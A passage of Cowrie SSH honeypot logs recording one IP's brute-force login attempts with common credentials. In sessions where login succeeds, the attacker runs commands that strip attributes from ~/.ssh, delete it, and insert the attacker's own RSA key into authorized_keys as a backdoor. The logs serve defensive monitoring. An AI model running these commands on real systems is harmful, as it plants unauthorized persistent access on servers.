"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:33.529991Z","src_ip":"212.227.235.229","session":"90ba6de4b81a"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-08T22:56:34.526336Z","src_ip":"212.227.235.229","session":"90ba6de4b81a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:35.785047Z","src_ip":"212.227.235.229","session":"90ba6de4b81a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48222,"dst_ip":"1.2.3.4","dst_port":22,"session":"10c147265b14","protocol":"ssh","message":"New connection: 212.227.235.229:48222 (1.2.3.4:22) [session: 10c147265b14]","sensor":"my-vps","timestamp":"2025-09-08T22:56:51.024681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:51.025795Z","src_ip":"212.227.235.229","session":"10c147265b14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:51.345771Z","src_ip":"212.227.235.229","session":"10c147265b14"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T22:56:52.666420Z","src_ip":"212.227.235.229","session":"10c147265b14"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:53.989797Z","src_ip":"212.227.235.229","session":"10c147265b14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39854,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ab74942b7b","protocol":"ssh","message":"New connection: 212.227.235.229:39854 (1.2.3.4:22) [session: 48ab74942b7b]","sensor":"my-vps","timestamp":"2025-09-08T22:56:55.301381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:55.302127Z","src_ip":"212.227.235.229","session":"48ab74942b7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36962,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d77a194fcf8","protocol":"ssh","message":"New connection: 212.227.235.229:36962 (1.2.3.4:22) [session: 2d77a194fcf8]","sensor":"my-vps","timestamp":"2025-09-08T22:57:00.226436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:00.227427Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:00.465004Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:01.304815Z","src_ip":"212.227.235.229","session":"48ab74942b7b"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:01.307674Z","src_ip":"212.227.235.229","session":"48ab74942b7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Niraj@123","message":"login attempt [root/Niraj@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:01.414720Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:01.954642Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:01.955430Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:01.956174Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:02.195287Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:02.687004Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:57:02.687698Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:57:02.927082Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:02.928006Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36966,"dst_ip":"1.2.3.4","dst_port":22,"session":"d793bb3770a1","protocol":"ssh","message":"New connection: 212.227.235.229:36966 (1.2.3.4:22) [session: d793bb3770a1]","sensor":"my-vps","timestamp":"2025-09-08T22:57:03.150193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:03.151069Z","src_ip":"212.227.235.229","session":"d793bb3770a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:03.380175Z","src_ip":"212.227.235.229","session":"d793bb3770a1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:04.340055Z","src_ip":"212.227.235.229","session":"d793bb3770a1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:05.571208Z","src_ip":"212.227.235.229","session":"d793bb3770a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36980,"dst_ip":"1.2.3.4","dst_port":22,"session":"06bd0378a4b6","protocol":"ssh","message":"New connection: 212.227.235.229:36980 (1.2.3.4:22) [session: 06bd0378a4b6]","sensor":"my-vps","timestamp":"2025-09-08T22:57:05.802538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:05.803193Z","src_ip":"212.227.235.229","session":"06bd0378a4b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:06.035130Z","src_ip":"212.227.235.229","session":"06bd0378a4b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:07.007514Z","src_ip":"212.227.235.229","session":"06bd0378a4b6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:07.243112Z","src_ip":"212.227.235.229","session":"06bd0378a4b6"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:07.247773Z","src_ip":"212.227.235.229","session":"2d77a194fcf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40454,"dst_ip":"1.2.3.4","dst_port":22,"session":"425c600c0db2","protocol":"ssh","message":"New connection: 212.227.235.229:40454 (1.2.3.4:22) [session: 425c600c0db2]","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.181390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.182556Z","src_ip":"212.227.235.229","session":"425c600c0db2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.282080Z","src_ip":"212.227.235.229","session":"425c600c0db2"}
{"eventid":"cowrie.login.failed","username":"user","password":"server","message":"login attempt [user/server] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.720093Z","src_ip":"212.227.235.229","session":"425c600c0db2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39646,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ee9fc674b51","protocol":"ssh","message":"New connection: 212.227.235.229:39646 (1.2.3.4:22) [session: 2ee9fc674b51]","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.950760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:08.954307Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:09.095145Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.login.success","username":"root","password":"12345a","message":"login attempt [root/12345a] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:09.639999Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:09.821424Z","src_ip":"212.227.235.229","session":"425c600c0db2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:09.976589Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:09.977300Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:09.978813Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.119287Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:10.405869Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.406573Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.547108Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.547938Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39658,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4a6975a41a3","protocol":"ssh","message":"New connection: 212.227.235.229:39658 (1.2.3.4:22) [session: e4a6975a41a3]","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.681480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.682255Z","src_ip":"212.227.235.229","session":"e4a6975a41a3"}
